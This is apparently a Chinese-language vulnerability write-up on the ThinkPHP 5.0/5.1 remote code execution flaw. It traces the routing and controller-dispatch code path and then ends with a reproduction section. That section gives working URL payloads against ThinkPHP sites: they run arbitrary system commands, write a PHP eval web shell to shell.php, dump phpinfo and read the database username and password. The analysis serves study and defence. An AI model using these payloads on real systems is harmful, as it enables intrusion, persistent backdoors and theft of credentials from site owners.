ThinkPHP遠(yuǎn)程命令執(zhí)行漏洞原理及復(fù)現(xiàn)

2018年12月11日，exploit-db更新了一個(gè)thinkphp框架遠(yuǎn)程代碼執(zhí)行漏洞
exploit地址：https://www.exploit-db.com/exploits/45978
由于框架對控制器名沒有進(jìn)行足夠的檢測導(dǎo)致在沒有開啟強(qiáng)制路由的情況下getshell
漏洞影響范圍
Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23
安裝：
下載地址http://www.thinkphp.cn/donate/download/id/1125.html
下載完解壓在/var/www/html/目錄下即可

漏洞分析
/thinkphp/library/think/App.php 行數(shù):120

我們可以看到通過self::routerCheck函數(shù)進(jìn)行路由檢測

我們可以看到又進(jìn)入$request->path()函數(shù)
/thinkphp/library/think/Request.php 行數(shù):416行

進(jìn)入pathinfo()函數(shù)，繼續(xù)追蹤到384行

Config::get('var_pathinfo')是配置文件中的設(shè)置的參數(shù)，默認(rèn)值為s，從GET中獲取鍵值，然后賦值給routeCheck中的$path
我們再回到App.php 行數(shù):606

這里會進(jìn)行路由檢測，檢查$check后會進(jìn)入else分支導(dǎo)入路由配置，接著檢測路由url調(diào)度結(jié)果為$result，如果調(diào)度失敗且開啟了強(qiáng)制路由$must，則報(bào)出路由無效，接著進(jìn)入Route::parseUrl函數(shù)，根據(jù)$path（自定義url）解析操作
開始跟蹤parseUrl函數(shù)
/thinkphp/library/think/Route.php 行數(shù):1208

進(jìn)入parseUrlPath函數(shù) 行數(shù):1275

這里我們可以看到對模塊/控制器/操作的url地址分割成數(shù)組來返回（沒截好圖有點(diǎn)重了）行數(shù):1217


我們可以看到，返回的結(jié)果賦值為$path,提取路由信息又封裝到$route,最后返回
thinkphp/library/think/App.php 行數(shù):120

進(jìn)入self::exec函數(shù) 行數(shù):445

我們可以看到模塊/控制器/操作 的函數(shù)為self::module
開始跟蹤module函數(shù) 行數(shù):494

我們可以看到，根據(jù)$config['app_multi_module']進(jìn)入多模塊部署，$bind為NULL，又進(jìn)入elseif分支，判斷模塊是否在禁止的列表里面$config['deny_module_list']，而且mmodule存在，$available = true，就不會拋出異常
module函數(shù)最后的返回值，發(fā)現(xiàn)$controller沒有進(jìn)行過濾，那么此時(shí)應(yīng)該為think\app，也就是return self::invokeMethod($call, $vars);

進(jìn)入self::invokeMethod函數(shù) 行數(shù):329

此時(shí)穿進(jìn)去的$call也就是$method,是一個(gè)數(shù)組，第一個(gè)元素是一個(gè)think\App對象，第二個(gè)元素則是調(diào)用方法名稱的字符串invokefunction，然后通過反射ReflectionMethod獲取這個(gè)對象下對應(yīng)的方法
再通過函數(shù)$args = self::bindParams($reflect, $vars);獲取傳入的參數(shù)，也就是payload

最后再調(diào)用反射$reflect->invokeArgs($args);，將Payload數(shù)組傳入反射對象函數(shù)invokeFunction，完成代碼執(zhí)行。

至此，ThinkPHP遠(yuǎn)程代碼執(zhí)行漏洞分析完成
————————————————————————————————————————
漏洞利用
http://xxx.xxx.xxx(這里為你的域名)/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
遠(yuǎn)程代碼執(zhí)行命令:whoami（鏈接后面的whoami可以改成你要執(zhí)行的命令,特殊符號請進(jìn)行url轉(zhuǎn)碼）
http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
通過phpinfo函數(shù)寫出phpinfo的信息

http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php
寫入shell
http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
也是顯示phpinfo

http://xxx.xxxx.xxx/thinkphp/public//?s=.|think\config/get&name=database.username
數(shù)據(jù)庫用戶名（后面的username改為password為數(shù)據(jù)庫密碼）